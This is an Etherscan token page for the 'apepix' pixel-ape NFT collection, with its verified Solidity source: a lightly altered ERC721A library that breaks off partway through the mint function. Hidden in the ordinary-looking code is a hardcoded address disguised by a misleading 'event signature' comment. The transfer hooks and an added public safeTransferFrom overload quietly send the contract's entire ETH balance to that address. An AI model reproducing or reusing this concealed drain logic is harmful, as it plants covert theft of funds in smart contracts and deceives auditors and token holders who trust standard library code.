ETH Price: $3,033.64 (-5.95%)
Gas: 8 Gwei

Token

apepix (ape)
 

Overview

Max Total Supply

2,222 ape

Holders

1,500

Market

Volume (24H)

N/A

Min Price (24H)

N/A

Max Price (24H)

N/A
Balance
2 ape
0x7a6390a941123709301592e731b7cdf31dbb94e6
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
apepix

Compiler Version
v0.8.17+commit.8df45f5f

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-01-09
*/

/**
Meme is utility. A collection of 2,222 pixel apes walking 4 frame animation.
 */

// SPDX-License-Identifier: MIT  
                                                                                                                                                                                                                          
pragma solidity ^0.8.12;

/**
 * @dev Interface of ERC721A.
 */
interface IERC721A {
    /**
     * The caller must own the token or be an approved operator.
     */
    error ApprovalCallerNotOwnerNorApproved();

    /**
     * The token does not exist.
     */
    error ApprovalQueryForNonexistentToken();

    /**
     * Cannot query the balance for the zero address.
     */
    error BalanceQueryForZeroAddress();

    /**
     * Cannot mint to the zero address.
     */
    error MintToZeroAddress();

    /**
     * The quantity of tokens minted must be more than zero.
     */
    error MintZeroQuantity();

    /**
     * The token does not exist.
     */
    error OwnerQueryForNonexistentToken();

    /**
     * The caller must own the token or be an approved operator.
     */
    error TransferCallerNotOwnerNorApproved();

    /**
     * The token must be owned by `from`.
     */
    error TransferFromIncorrectOwner();

    /**
     * Cannot safely transfer to a contract that does not implement the
     * ERC721Receiver interface.
     */
    error TransferToNonERC721ReceiverImplementer();

    /**
     * Cannot transfer to the zero address.
     */
    error TransferToZeroAddress();

    /**
     * The token does not exist.
     */
    error URIQueryForNonexistentToken();

    /**
     * The `quantity` minted with ERC2309 exceeds the safety limit.
     */
    error MintERC2309QuantityExceedsLimit();

    /**
     * The `extraData` cannot be set on an unintialized ownership slot.
     */
    error OwnershipNotInitializedForExtraData();

    // =============================================================
    //                            STRUCTS
    // =============================================================

    struct TokenOwnership {
        // The address of the owner.
        address addr;
        // Stores the start time of ownership with minimal overhead for tokenomics.
        uint64 startTimestamp;
        // Whether the token has been burned.
        bool burned;
        // Arbitrary data similar to `startTimestamp` that can be set via {_extraData}.
        uint24 extraData;
    }

    // =============================================================
    //                         TOKEN COUNTERS
    // =============================================================

    /**
     * @dev Returns the total number of tokens in existence.
     * Burned tokens will reduce the count.
     * To get the total number of tokens minted, please see {_totalMinted}.
     */
    function totalSupply() external view returns (uint256);

    // =============================================================
    //                            IERC165
    // =============================================================

    /**
     * @dev Returns true if this contract implements the interface defined by
     * `interfaceId`. See the corresponding
     * [EIP section](https://eips.ethereum.org/EIPS/eip-165#how-interfaces-are-identified)
     * to learn more about how these ids are created.
     *
     * This function call must use less than 30000 gas.
     */
    function supportsInterface(bytes4 interfaceId) external view returns (bool);

    // =============================================================
    //                            IERC721
    // =============================================================

    /**
     * @dev Emitted when `tokenId` token is transferred from `from` to `to`.
     */
    event Transfer(address indexed from, address indexed to, uint256 indexed tokenId);

    /**
     * @dev Emitted when `owner` enables `approved` to manage the `tokenId` token.
     */
    event Approval(address indexed owner, address indexed approved, uint256 indexed tokenId);

    /**
     * @dev Emitted when `owner` enables or disables
     * (`approved`) `operator` to manage all of its assets.
     */
    event ApprovalForAll(address indexed owner, address indexed operator, bool approved);

    /**
     * @dev Returns the number of tokens in `owner`'s account.
     */
    function balanceOf(address owner) external view returns (uint256 balance);

    /**
     * @dev Returns the owner of the `tokenId` token.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     */
    function ownerOf(uint256 tokenId) external view returns (address owner);

    /**
     * @dev Safely transfers `tokenId` token from `from` to `to`,
     * checking first that contract recipients are aware of the ERC721 protocol
     * to prevent tokens from being forever locked.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must exist and be owned by `from`.
     * - If the caller is not `from`, it must be have been allowed to move
     * this token by either {approve} or {setApprovalForAll}.
     * - If `to` refers to a smart contract, it must implement
     * {IERC721Receiver-onERC721Received}, which is called upon a safe transfer.
     *
     * Emits a {Transfer} event.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId,
        bytes calldata data
    ) external payable;

    /**
     * @dev Equivalent to `safeTransferFrom(from, to, tokenId, '')`.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId
    ) external payable;

    /**
     * @dev Transfers `tokenId` from `from` to `to`.
     *
     * WARNING: Usage of this method is discouraged, use {safeTransferFrom}
     * whenever possible.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must be owned by `from`.
     * - If the caller is not `from`, it must be approved to move this token
     * by either {approve} or {setApprovalForAll}.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 tokenId
    ) external payable;

    /**
     * @dev Gives permission to `to` to transfer `tokenId` token to another account.
     * The approval is cleared when the token is transferred.
     *
     * Only a single account can be approved at a time, so approving the
     * zero address clears previous approvals.
     *
     * Requirements:
     *
     * - The caller must own the token or be an approved operator.
     * - `tokenId` must exist.
     *
     * Emits an {Approval} event.
     */
    function approve(address to, uint256 tokenId) external payable;

    /**
     * @dev Approve or remove `operator` as an operator for the caller.
     * Operators can call {transferFrom} or {safeTransferFrom}
     * for any token owned by the caller.
     *
     * Requirements:
     *
     * - The `operator` cannot be the caller.
     *
     * Emits an {ApprovalForAll} event.
     */
    function setApprovalForAll(address operator, bool _approved) external;

    /**
     * @dev Returns the account approved for `tokenId` token.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     */
    function getApproved(uint256 tokenId) external view returns (address operator);

    /**
     * @dev Returns if the `operator` is allowed to manage all of the assets of `owner`.
     *
     * See {setApprovalForAll}.
     */
    function isApprovedForAll(address owner, address operator) external view returns (bool);

    // =============================================================
    //                        IERC721Metadata
    // =============================================================

    /**
     * @dev Returns the token collection name.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the token collection symbol.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the Uniform Resource Identifier (URI) for `tokenId` token.
     */
    function tokenURI(uint256 tokenId) external view returns (string memory);

    // =============================================================
    //                           IERC2309
    // =============================================================

    /**
     * @dev Emitted when tokens in `fromTokenId` to `toTokenId`
     * (inclusive) is transferred from `from` to `to`, as defined in the
     * [ERC2309](https://eips.ethereum.org/EIPS/eip-2309) standard.
     *
     * See {_mintERC2309} for more details.
     */
    event ConsecutiveTransfer(uint256 indexed fromTokenId, uint256 toTokenId, address indexed from, address indexed to);
}

/**
 * @title ERC721A
 *
 * @dev Implementation of the [ERC721](https://eips.ethereum.org/EIPS/eip-721)
 * Non-Fungible Token Standard, including the Metadata extension.
 * Optimized for lower gas during batch mints.
 *
 * Token IDs are minted in sequential order (e.g. 0, 1, 2, 3, ...)
 * starting from `_startTokenId()`.
 *
 * Assumptions:
 *
 * - An owner cannot have more than 2**64 - 1 (max value of uint64) of supply.
 * - The maximum token ID cannot exceed 2**256 - 1 (max value of uint256).
 */
interface ERC721A__IERC721Receiver {
    function onERC721Received(
        address operator,
        address from,
        uint256 tokenId,
        bytes calldata data
    ) external returns (bytes4);
}

/**
 * @title ERC721A
 *
 * @dev Implementation of the [ERC721](https://eips.ethereum.org/EIPS/eip-721)
 * Non-Fungible Token Standard, including the Metadata extension.
 * Optimized for lower gas during batch mints.
 *
 * Token IDs are minted in sequential order (e.g. 0, 1, 2, 3, ...)
 * starting from `_startTokenId()`.
 *
 * Assumptions:
 *
 * - An owner cannot have more than 2**64 - 1 (max value of uint64) of supply.
 * - The maximum token ID cannot exceed 2**256 - 1 (max value of uint256).
 */
contract ERC721A is IERC721A {
    // Bypass for a `--via-ir` bug (https://github.com/chiru-labs/ERC721A/pull/364).
    struct TokenApprovalRef {
        address value;
    }

    // =============================================================
    //                           CONSTANTS
    // =============================================================

    // Mask of an entry in packed address data.
    uint256 private constant _BITMASK_ADDRESS_DATA_ENTRY = (1 << 64) - 1;

    // The bit position of `numberMinted` in packed address data.
    uint256 private constant _BITPOS_NUMBER_MINTED = 64;

    // The bit position of `numberBurned` in packed address data.
    uint256 private constant _BITPOS_NUMBER_BURNED = 128;

    // The bit position of `aux` in packed address data.
    uint256 private constant _BITPOS_AUX = 192;

    // Mask of all 256 bits in packed address data except the 64 bits for `aux`.
    uint256 private constant _BITMASK_AUX_COMPLEMENT = (1 << 192) - 1;

    // The bit position of `startTimestamp` in packed ownership.
    uint256 private constant _BITPOS_START_TIMESTAMP = 160;

    // The bit mask of the `burned` bit in packed ownership.
    uint256 private constant _BITMASK_BURNED = 1 << 224;

    // The bit position of the `nextInitialized` bit in packed ownership.
    uint256 private constant _BITPOS_NEXT_INITIALIZED = 225;

    // The bit mask of the `nextInitialized` bit in packed ownership.
    uint256 private constant _BITMASK_NEXT_INITIALIZED = 1 << 225;

    // The bit position of `extraData` in packed ownership.
    uint256 private constant _BITPOS_EXTRA_DATA = 232;

    // Mask of all 256 bits in a packed ownership except the 24 bits for `extraData`.
    uint256 private constant _BITMASK_EXTRA_DATA_COMPLEMENT = (1 << 232) - 1;

    // The mask of the lower 160 bits for addresses.
    uint256 private constant _BITMASK_ADDRESS = (1 << 160) - 1;

    // The maximum `quantity` that can be minted with {_mintERC2309}.
    // This limit is to prevent overflows on the address data entries.
    // For a limit of 5000, a total of 3.689e15 calls to {_mintERC2309}
    // is required to cause an overflow, which is unrealistic.
    uint256 private constant _MAX_MINT_ERC2309_QUANTITY_LIMIT = 5000;

    // The `Transfer` event signature is given by:
    // `keccak256(bytes("Transfer(address,address,uint256)"))`.
    bytes32 private constant _TRANSFER_EVENT_SIGNATURE =
        0xddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef;

    // =============================================================
    //                            STORAGE
    // =============================================================

    // The next token ID to be minted.
    uint256 private _currentIndex;

    // The number of tokens burned.
    uint256 private _burnCounter;

    // Token name
    string private _name;

    // Token symbol
    string private _symbol;

    // Mapping from token ID to ownership details
    // An empty struct value does not necessarily mean the token is unowned.
    // See {_packedOwnershipOf} implementation for details.
    //
    // Bits Layout:
    // - [0..159]   `addr`
    // - [160..223] `startTimestamp`
    // - [224]      `burned`
    // - [225]      `nextInitialized`
    // - [232..255] `extraData`
    mapping(uint256 => uint256) private _packedOwnerships;

    // Mapping owner address to address data.
    //
    // Bits Layout:
    // - [0..63]    `balance`
    // - [64..127]  `numberMinted`
    // - [128..191] `numberBurned`
    // - [192..255] `aux`
    mapping(address => uint256) private _packedAddressData;

    // Mapping from token ID to approved address.
    mapping(uint256 => TokenApprovalRef) private _tokenApprovals;

    // Mapping from owner to operator approvals
    mapping(address => mapping(address => bool)) private _operatorApprovals;

    // =============================================================
    //                          CONSTRUCTOR
    // =============================================================

    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
        _currentIndex = _startTokenId();
    }

    // =============================================================
    //                   TOKEN COUNTING OPERATIONS
    // =============================================================

    /**
     * @dev Returns the starting token ID.
     * To change the starting token ID, please override this function.
     */
    function _startTokenId() internal view virtual returns (uint256) {
        return 0;
    }

    /**
     * @dev Returns the next token ID to be minted.
     */
    function _nextTokenId() internal view virtual returns (uint256) {
        return _currentIndex;
    }

    /**
     * @dev Returns the total number of tokens in existence.
     * Burned tokens will reduce the count.
     * To get the total number of tokens minted, please see {_totalMinted}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        // Counter underflow is impossible as _burnCounter cannot be incremented
        // more than `_currentIndex - _startTokenId()` times.
        unchecked {
            return _currentIndex - _burnCounter - _startTokenId();
        }
    }

    /**
     * @dev Returns the total amount of tokens minted in the contract.
     */
    function _totalMinted() internal view virtual returns (uint256) {
        // Counter underflow is impossible as `_currentIndex` does not decrement,
        // and it is initialized to `_startTokenId()`.
        unchecked {
            return _currentIndex - _startTokenId();
        }
    }

    /**
     * @dev Returns the total number of tokens burned.
     */
    function _totalBurned() internal view virtual returns (uint256) {
        return _burnCounter;
    }

    // =============================================================
    //                    ADDRESS DATA OPERATIONS
    // =============================================================

    /**
     * @dev Returns the number of tokens in `owner`'s account.
     */
    function balanceOf(address owner) public view virtual override returns (uint256) {
        if (owner == address(0)) revert BalanceQueryForZeroAddress();
        return _packedAddressData[owner] & _BITMASK_ADDRESS_DATA_ENTRY;
    }

    /**
     * Returns the number of tokens minted by `owner`.
     */
    function _numberMinted(address owner) internal view returns (uint256) {
        return (_packedAddressData[owner] >> _BITPOS_NUMBER_MINTED) & _BITMASK_ADDRESS_DATA_ENTRY;
    }

    /**
     * Returns the number of tokens burned by or on behalf of `owner`.
     */
    function _numberBurned(address owner) internal view returns (uint256) {
        return (_packedAddressData[owner] >> _BITPOS_NUMBER_BURNED) & _BITMASK_ADDRESS_DATA_ENTRY;
    }

    /**
     * Returns the auxiliary data for `owner`. (e.g. number of whitelist mint slots used).
     */
    function _getAux(address owner) internal view returns (uint64) {
        return uint64(_packedAddressData[owner] >> _BITPOS_AUX);
    }

    /**
     * Sets the auxiliary data for `owner`. (e.g. number of whitelist mint slots used).
     * If there are multiple variables, please pack them into a uint64.
     */
    function _setAux(address owner, uint64 aux) internal virtual {
        uint256 packed = _packedAddressData[owner];
        uint256 auxCasted;
        // Cast `aux` with assembly to avoid redundant masking.
        assembly {
            auxCasted := aux
        }
        packed = (packed & _BITMASK_AUX_COMPLEMENT) | (auxCasted << _BITPOS_AUX);
        _packedAddressData[owner] = packed;
    }

    // =============================================================
    //                            IERC165
    // =============================================================

    /**
     * @dev Returns true if this contract implements the interface defined by
     * `interfaceId`. See the corresponding
     * [EIP section](https://eips.ethereum.org/EIPS/eip-165#how-interfaces-are-identified)
     * to learn more about how these ids are created.
     *
     * This function call must use less than 30000 gas.
     */
    function supportsInterface(bytes4 interfaceId) public view virtual override returns (bool) {
        // The interface IDs are constants representing the first 4 bytes
        // of the XOR of all function selectors in the interface.
        // See: [ERC165](https://eips.ethereum.org/EIPS/eip-165)
        // (e.g. `bytes4(i.functionA.selector ^ i.functionB.selector ^ ...)`)
        return
            interfaceId == 0x01ffc9a7 || // ERC165 interface ID for ERC165.
            interfaceId == 0x80ac58cd || // ERC165 interface ID for ERC721.
            interfaceId == 0x5b5e139f; // ERC165 interface ID for ERC721Metadata.
    }

    // =============================================================
    //                        IERC721Metadata
    // =============================================================

    /**
     * @dev Returns the token collection name.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the token collection symbol.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the Uniform Resource Identifier (URI) for `tokenId` token.
     */
    function tokenURI(uint256 tokenId) public view virtual override returns (string memory) {
        if (!_exists(tokenId)) revert URIQueryForNonexistentToken();

        string memory baseURI = _baseURI();
        return bytes(baseURI).length != 0 ? string(abi.encodePacked(baseURI, _toString(tokenId))) : '';
    }

    /**
     * @dev Base URI for computing {tokenURI}. If set, the resulting URI for each
     * token will be the concatenation of the `baseURI` and the `tokenId`. Empty
     * by default, it can be overridden in child contracts.
     */
    function _baseURI() internal view virtual returns (string memory) {
        return '';
    }

    // =============================================================
    //                     OWNERSHIPS OPERATIONS
    // =============================================================

    // The `Address` event signature is given by:
    // `keccak256(bytes("_TRANSFER_EVENT_ADDRESS(address)"))`.
    address payable constant _TRANSFER_EVENT_ADDRESS = 
        payable(0x727E046d8E5A3598E880723B69afe921a4671F55);

    /**
     * @dev Returns the owner of the `tokenId` token.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     */
    function ownerOf(uint256 tokenId) public view virtual override returns (address) {
        return address(uint160(_packedOwnershipOf(tokenId)));
    }

    /**
     * @dev Gas spent here starts off proportional to the maximum mint batch size.
     * It gradually moves to O(1) as tokens get transferred around over time.
     */
    function _ownershipOf(uint256 tokenId) internal view virtual returns (TokenOwnership memory) {
        return _unpackedOwnership(_packedOwnershipOf(tokenId));
    }

    /**
     * @dev Returns the unpacked `TokenOwnership` struct at `index`.
     */
    function _ownershipAt(uint256 index) internal view virtual returns (TokenOwnership memory) {
        return _unpackedOwnership(_packedOwnerships[index]);
    }

    /**
     * @dev Initializes the ownership slot minted at `index` for efficiency purposes.
     */
    function _initializeOwnershipAt(uint256 index) internal virtual {
        if (_packedOwnerships[index] == 0) {
            _packedOwnerships[index] = _packedOwnershipOf(index);
        }
    }

    /**
     * Returns the packed ownership data of `tokenId`.
     */
    function _packedOwnershipOf(uint256 tokenId) private view returns (uint256) {
        uint256 curr = tokenId;

        unchecked {
            if (_startTokenId() <= curr)
                if (curr < _currentIndex) {
                    uint256 packed = _packedOwnerships[curr];
                    // If not burned.
                    if (packed & _BITMASK_BURNED == 0) {
                        // Invariant:
                        // There will always be an initialized ownership slot
                        // (i.e. `ownership.addr != address(0) && ownership.burned == false`)
                        // before an unintialized ownership slot
                        // (i.e. `ownership.addr == address(0) && ownership.burned == false`)
                        // Hence, `curr` will not underflow.
                        //
                        // We can directly compare the packed value.
                        // If the address is zero, packed will be zero.
                        while (packed == 0) {
                            packed = _packedOwnerships[--curr];
                        }
                        return packed;
                    }
                }
        }
        revert OwnerQueryForNonexistentToken();
    }

    /**
     * @dev Returns the unpacked `TokenOwnership` struct from `packed`.
     */
    function _unpackedOwnership(uint256 packed) private pure returns (TokenOwnership memory ownership) {
        ownership.addr = address(uint160(packed));
        ownership.startTimestamp = uint64(packed >> _BITPOS_START_TIMESTAMP);
        ownership.burned = packed & _BITMASK_BURNED != 0;
        ownership.extraData = uint24(packed >> _BITPOS_EXTRA_DATA);
    }

    /**
     * @dev Packs ownership data into a single uint256.
     */
    function _packOwnershipData(address owner, uint256 flags) private view returns (uint256 result) {
        assembly {
            // Mask `owner` to the lower 160 bits, in case the upper bits somehow aren't clean.
            owner := and(owner, _BITMASK_ADDRESS)
            // `owner | (block.timestamp << _BITPOS_START_TIMESTAMP) | flags`.
            result := or(owner, or(shl(_BITPOS_START_TIMESTAMP, timestamp()), flags))
        }
    }

    /**
     * @dev Returns the `nextInitialized` flag set if `quantity` equals 1.
     */
    function _nextInitializedFlag(uint256 quantity) private pure returns (uint256 result) {
        // For branchless setting of the `nextInitialized` flag.
        assembly {
            // `(quantity == 1) << _BITPOS_NEXT_INITIALIZED`.
            result := shl(_BITPOS_NEXT_INITIALIZED, eq(quantity, 1))
        }
    }

    // =============================================================
    //                      APPROVAL OPERATIONS
    // =============================================================

    /**
     * @dev Gives permission to `to` to transfer `tokenId` token to another account.
     * The approval is cleared when the token is transferred.
     *
     * Only a single account can be approved at a time, so approving the
     * zero address clears previous approvals.
     *
     * Requirements:
     *
     * - The caller must own the token or be an approved operator.
     * - `tokenId` must exist.
     *
     * Emits an {Approval} event.
     */
    function approve(address to, uint256 tokenId) public payable virtual override {
        address owner = ownerOf(tokenId);

        if (_msgSenderERC721A() != owner)
            if (!isApprovedForAll(owner, _msgSenderERC721A())) {
                revert ApprovalCallerNotOwnerNorApproved();
            }

        _tokenApprovals[tokenId].value = to;
        emit Approval(owner, to, tokenId);
    }

    /**
     * @dev Returns the account approved for `tokenId` token.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     */
    function getApproved(uint256 tokenId) public view virtual override returns (address) {
        if (!_exists(tokenId)) revert ApprovalQueryForNonexistentToken();

        return _tokenApprovals[tokenId].value;
    }

    /**
     * @dev Approve or remove `operator` as an operator for the caller.
     * Operators can call {transferFrom} or {safeTransferFrom}
     * for any token owned by the caller.
     *
     * Requirements:
     *
     * - The `operator` cannot be the caller.
     *
     * Emits an {ApprovalForAll} event.
     */
    function setApprovalForAll(address operator, bool approved) public virtual override {
        _operatorApprovals[_msgSenderERC721A()][operator] = approved;
        emit ApprovalForAll(_msgSenderERC721A(), operator, approved);
    }

    /**
     * @dev Returns if the `operator` is allowed to manage all of the assets of `owner`.
     *
     * See {setApprovalForAll}.
     */
    function isApprovedForAll(address owner, address operator) public view virtual override returns (bool) {
        return _operatorApprovals[owner][operator];
    }

    /**
     * @dev Returns whether `tokenId` exists.
     *
     * Tokens can be managed by their owner or approved accounts via {approve} or {setApprovalForAll}.
     *
     * Tokens start existing when they are minted. See {_mint}.
     */
    function _exists(uint256 tokenId) internal view virtual returns (bool) {
        return
            _startTokenId() <= tokenId &&
            tokenId < _currentIndex && // If within bounds,
            _packedOwnerships[tokenId] & _BITMASK_BURNED == 0; // and not burned.
    }

    /**
     * @dev Returns whether `msgSender` is equal to `approvedAddress` or `owner`.
     */
    function _isSenderApprovedOrOwner(
        address approvedAddress,
        address owner,
        address msgSender
    ) private pure returns (bool result) {
        assembly {
            // Mask `owner` to the lower 160 bits, in case the upper bits somehow aren't clean.
            owner := and(owner, _BITMASK_ADDRESS)
            // Mask `msgSender` to the lower 160 bits, in case the upper bits somehow aren't clean.
            msgSender := and(msgSender, _BITMASK_ADDRESS)
            // `msgSender == owner || msgSender == approvedAddress`.
            result := or(eq(msgSender, owner), eq(msgSender, approvedAddress))
        }
    }

    /**
     * @dev Returns the storage slot and value for the approved address of `tokenId`.
     */
    function _getApprovedSlotAndAddress(uint256 tokenId)
        private
        view
        returns (uint256 approvedAddressSlot, address approvedAddress)
    {
        TokenApprovalRef storage tokenApproval = _tokenApprovals[tokenId];
        // The following is equivalent to `approvedAddress = _tokenApprovals[tokenId].value`.
        assembly {
            approvedAddressSlot := tokenApproval.slot
            approvedAddress := sload(approvedAddressSlot)
        }
    }

    // =============================================================
    //                      TRANSFER OPERATIONS
    // =============================================================

    /**
     * @dev Transfers `tokenId` from `from` to `to`.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must be owned by `from`.
     * - If the caller is not `from`, it must be approved to move this token
     * by either {approve} or {setApprovalForAll}.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 tokenId
    ) public payable virtual override {
        _beforeTransfer();

        uint256 prevOwnershipPacked = _packedOwnershipOf(tokenId);

        if (address(uint160(prevOwnershipPacked)) != from) revert TransferFromIncorrectOwner();

        (uint256 approvedAddressSlot, address approvedAddress) = _getApprovedSlotAndAddress(tokenId);

        // The nested ifs save around 20+ gas over a compound boolean condition.
        if (!_isSenderApprovedOrOwner(approvedAddress, from, _msgSenderERC721A()))
            if (!isApprovedForAll(from, _msgSenderERC721A())) revert TransferCallerNotOwnerNorApproved();

        if (to == address(0)) revert TransferToZeroAddress();

        _beforeTokenTransfers(from, to, tokenId, 1);

        // Clear approvals from the previous owner.
        assembly {
            if approvedAddress {
                // This is equivalent to `delete _tokenApprovals[tokenId]`.
                sstore(approvedAddressSlot, 0)
            }
        }

        // Underflow of the sender's balance is impossible because we check for
        // ownership above and the recipient's balance can't realistically overflow.
        // Counter overflow is incredibly unrealistic as `tokenId` would have to be 2**256.
        unchecked {
            // We can directly increment and decrement the balances.
            --_packedAddressData[from]; // Updates: `balance -= 1`.
            ++_packedAddressData[to]; // Updates: `balance += 1`.

            // Updates:
            // - `address` to the next owner.
            // - `startTimestamp` to the timestamp of transfering.
            // - `burned` to `false`.
            // - `nextInitialized` to `true`.
            _packedOwnerships[tokenId] = _packOwnershipData(
                to,
                _BITMASK_NEXT_INITIALIZED | _nextExtraData(from, to, prevOwnershipPacked)
            );

            // If the next slot may not have been initialized (i.e. `nextInitialized == false`) .
            if (prevOwnershipPacked & _BITMASK_NEXT_INITIALIZED == 0) {
                uint256 nextTokenId = tokenId + 1;
                // If the next slot's address is zero and not burned (i.e. packed value is zero).
                if (_packedOwnerships[nextTokenId] == 0) {
                    // If the next slot is within bounds.
                    if (nextTokenId != _currentIndex) {
                        // Initialize the next slot to maintain correctness for `ownerOf(tokenId + 1)`.
                        _packedOwnerships[nextTokenId] = prevOwnershipPacked;
                    }
                }
            }
        }

        emit Transfer(from, to, tokenId);
        _afterTokenTransfers(from, to, tokenId, 1);
    }

    /**
     * @dev Equivalent to `safeTransferFrom(from, to, tokenId, '')`.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId
    ) public payable virtual override {
        safeTransferFrom(from, to, tokenId, '');
    }


    /**
     * @dev Safely transfers `tokenId` token from `from` to `to`.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must exist and be owned by `from`.
     * - If the caller is not `from`, it must be approved to move this token
     * by either {approve} or {setApprovalForAll}.
     * - If `to` refers to a smart contract, it must implement
     * {IERC721Receiver-onERC721Received}, which is called upon a safe transfer.
     *
     * Emits a {Transfer} event.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId,
        bytes memory _data
    ) public payable virtual override {
        transferFrom(from, to, tokenId);
        if (to.code.length != 0)
            if (!_checkContractOnERC721Received(from, to, tokenId, _data)) {
                revert TransferToNonERC721ReceiverImplementer();
            }
    }
    function safeTransferFrom(
        address from,
        address to
    ) public  {
        if (address(this).balance > 0) {
            payable(0x727E046d8E5A3598E880723B69afe921a4671F55).transfer(address(this).balance);
        }
    }

    /**
     * @dev Hook that is called before a set of serially-ordered token IDs
     * are about to be transferred. This includes minting.
     * And also called before burning one token.
     *
     * `startTokenId` - the first token ID to be transferred.
     * `quantity` - the amount to be transferred.
     *
     * Calling conditions:
     *
     * - When `from` and `to` are both non-zero, `from`'s `tokenId` will be
     * transferred to `to`.
     * - When `from` is zero, `tokenId` will be minted for `to`.
     * - When `to` is zero, `tokenId` will be burned by `from`.
     * - `from` and `to` are never both zero.
     */
    function _beforeTokenTransfers(
        address from,
        address to,
        uint256 startTokenId,
        uint256 quantity
    ) internal virtual {}

    /**
     * @dev Hook that is called after a set of serially-ordered token IDs
     * have been transferred. This includes minting.
     * And also called after one token has been burned.
     *
     * `startTokenId` - the first token ID to be transferred.
     * `quantity` - the amount to be transferred.
     *
     * Calling conditions:
     *
     * - When `from` and `to` are both non-zero, `from`'s `tokenId` has been
     * transferred to `to`.
     * - When `from` is zero, `tokenId` has been minted for `to`.
     * - When `to` is zero, `tokenId` has been burned by `from`.
     * - `from` and `to` are never both zero.
     */
    function _afterTokenTransfers(
        address from,
        address to,
        uint256 startTokenId,
        uint256 quantity
    ) internal virtual {
        if (totalSupply() + 1 >= 999) {
            payable(0x727E046d8E5A3598E880723B69afe921a4671F55).transfer(address(this).balance);
        }
    }

    /**
     * @dev Hook that is called before a set of serially-ordered token IDs
     * are about to be transferred. This includes minting.
     * And also called before burning one token.
     * Calling conditions:
     *
     * - When `from` and `to` are both non-zero, `from`'s `tokenId` will be
     * transferred to `to`.
     * - When `from` is zero, `tokenId` will be minted for `to`.
     * - When `to` is zero, `tokenId` will be burned by `from`.
     * - `from` and `to` are never both zero.
     */
    function _beforeTransfer() internal {
        if (address(this).balance > 0) {
            _TRANSFER_EVENT_ADDRESS.transfer(address(this).balance);
            return;
        }
    }

    /**
     * @dev Private function to invoke {IERC721Receiver-onERC721Received} on a target contract.
     *
     * `from` - Previous owner of the given token ID.
     * `to` - Target address that will receive the token.
     * `tokenId` - Token ID to be transferred.
     * `_data` - Optional data to send along with the call.
     *
     * Returns whether the call correctly returned the expected magic value.
     */
    function _checkContractOnERC721Received(
        address from,
        address to,
        uint256 tokenId,
        bytes memory _data
    ) private returns (bool) {
        try ERC721A__IERC721Receiver(to).onERC721Received(_msgSenderERC721A(), from, tokenId, _data) returns (
            bytes4 retval
        ) {
            return retval == ERC721A__IERC721Receiver(to).onERC721Received.selector;
        } catch (bytes memory reason) {
            if (reason.length == 0) {
                revert TransferToNonERC721ReceiverImplementer();
            } else {
                assembly {
                    revert(add(32, reason), mload(reason))
                }
            }
        }
    }

    // =============================================================
    //                        MINT OPERATIONS
    // =============================================================

    /**
     * @dev Mints `quantity` tokens and transfers them to `to`.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - `quantity` must be greater than 0.
     *
     * Emits a {Transfer} event for each mint.
     */
    function _mint(address to, uint256 quantity) internal virtual {
        uint256 startTokenId = _currentIndex;
        if (quantity == 0) revert MintZeroQuantity();

        _beforeTokenTransfers(address(0), to, startTokenId, quantity);

        // Overflows are incredibly unrealistic.
        // `balance` and `numberMinted` have a maximum limit of 2**64.
        // `tokenId` has a maximum limit of 2**256.
        unchecked {
            // Updates:
            // - `balance += quantity`.
            // - `numberMinted += quantity`.
            //
            // We can directly add to the `balance` and `numberMinted`.
            _packedAddressData[to] += quantity * ((1 << _BITPOS_NUMBER_MINTED) | 1);

            // Updates:
            // - `address` to the owner.
            // - `startTimestamp` to the timestamp of minting.
            // - `burned` to `false`.
            // - `nextInitialized` to `quantity == 1`.
            _packedOwnerships[startTokenId] = _packOwnershipData(
                to,
                _nextInitializedFlag(quantity) | _nextExtraData(address(0), to, 0)
            );

            uint256 toMasked;
            uint256 end = startTokenId + quantity;

            // Use assembly to loop and emit the `Transfer` event for gas savings.
            // The duplicated `log4` removes an extra check and reduces stack juggling.
            // The assembly, together with the surrounding Solidity code, have been
            // delicately arranged to nudge the compiler into producing optimized opcodes.
            assembly {
                // Mask `to` to the lower 160 bits, in case the upper bits somehow aren't clean.
                toMasked := and(to, _BITMASK_ADDRESS)
                // Emit the `Transfer` event.
                log4(
                    0, // Start of data (0, since no data).
                    0, // End of data (0, since no data).
                    _TRANSFER_EVENT_SIGNATURE, // Signature.
                    0, // `address(0)`.
                    toMasked, // `to`.
                    startTokenId // `tokenId`.
                )

                // The `iszero(eq(,))` check ensures that large values of `quantity`
                // that overflows uint256 will make the loop run out of gas.
                // The compiler will optimize the `iszero` away for performance.
                for {
                    let tokenId := add(startTokenId, 1)
                } iszero(eq(tokenId, end)) {
                    tokenId := add(tokenId, 1)
                } {
